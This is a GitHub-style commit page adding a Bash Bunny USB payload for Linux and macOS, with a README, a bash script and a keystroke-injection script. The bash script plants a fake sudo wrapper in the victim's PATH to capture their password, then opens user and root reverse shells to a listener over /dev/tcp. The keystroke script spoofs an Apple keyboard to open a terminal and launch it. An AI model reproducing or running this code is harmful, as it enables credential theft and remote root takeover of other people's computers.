Peaks
GitHub
commit
c1b03dacf7
|
|
@ -0,0 +1,15 @@
|
|||
# Root_Reverse_Shell_linux_mac
|
||||
|
||||
### Since i dont have a bash bunny this is tested in digispark
|
||||
### I have converted this script to bash bunny
|
||||
### If any issues put in discussion i will fix it
|
||||
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
|
||||
### Special thanks to sudobackdoor for bash script sample
|
||||
Dont forget to change IP in payload.sh.<br/>
|
||||
Before using this payload don't forget to start netcat listeners on port 4444 and 1337.<br/>
|
||||
It reverse connects user shell in port 4444 and root shell in port 1337.<br/>
|
||||
Make sure switch is in position 1.<br/>
|
||||
|
||||
Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
|
||||
|
||||
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
|
||||
|
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
LISTENER_IP="127.0.0.1"
|
||||
LISTENER1_PORT="1337" #Listener for root shell
|
||||
LISTENER2_PORT="4444" #Listener for user shell
|
||||
|
||||
if [ ! -d ~/.config/sudo ]
|
||||
then
|
||||
mkdir -p ~/.config/sudo
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/sudo/sudo ]
|
||||
then
|
||||
rm ~/.config/sudo/sudo
|
||||
fi
|
||||
|
||||
|
||||
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||
/usr/bin/sudo -n true 2>/dev/null
|
||||
if [ $? -eq 0 ]
|
||||
then
|
||||
/usr/bin/sudo $@
|
||||
else
|
||||
echo -n "[sudo] password for $USER: "
|
||||
read -s pwd
|
||||
echo
|
||||
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||
if [ $? -eq 1 ]
|
||||
then
|
||||
echo "Sorry, try again."
|
||||
sudo $@
|
||||
else
|
||||
/usr/bin/sudo -S $@
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
rm ~/.bash_profile
|
||||
mv ~/.bash_profile.bak ~/.bash_profile
|
||||
else
|
||||
rm ~/.bashrc
|
||||
mv ~/.bashrc.bak ~/.bashrc
|
||||
fi
|
||||
rm ~/.config/sudo/sudo
|
||||
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) &
|
||||
fi
|
||||
fi
|
||||
EOF
|
||||
|
||||
chmod u+x ~/.config/sudo/sudo
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
cp ~/.bash_profile ~/.bash_profile.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
cp ~/.bashrc ~/.bashrc.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) &
|
||||
bash
|
||||
|
|
@ -0,0 +1,50 @@
|
|||
# Title: Linux/Mac Reverse Shell
|
||||
# Author: Darkprince (Sridhar)
|
||||
# Version: 1.0
|
||||
#
|
||||
# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell.
|
||||
|
||||
# Magenta..................Setup
|
||||
# Red, Green, Blue.........Executing
|
||||
# Green....................Finished
|
||||
|
||||
# INITIALIZING
|
||||
LED W
|
||||
|
||||
# Mac keyboard works in Linux and Mac
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||
|
||||
LANGUAGE='us'
|
||||
|
||||
# Ensure the switch position is 1
|
||||
# Delay for HID device recognition
|
||||
Q DELAY 1000
|
||||
|
||||
# ATTACKING
|
||||
LED R G B
|
||||
|
||||
# Get Linux/Mac Terminal
|
||||
RUN UNITY xterm
|
||||
Q DELAY 1000
|
||||
# To close the opened window by the Linux run command
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
RUN OSX terminal
|
||||
Q DELAY 1000
|
||||
|
||||
# If Linux, then clearing 'terminal' which is typed by Mac run script
|
||||
Q CTRL C
|
||||
|
||||
# Execute bash script which is the same for Mac and Linux
|
||||
GET SWITCH_POSITION
|
||||
Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
|
||||
|
||||
# The cleanup process will be handled by the bash script
|
||||
# Closing the xterm in Linux
|
||||
# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
LED G
|
||||
Loading…
Reference in New Issue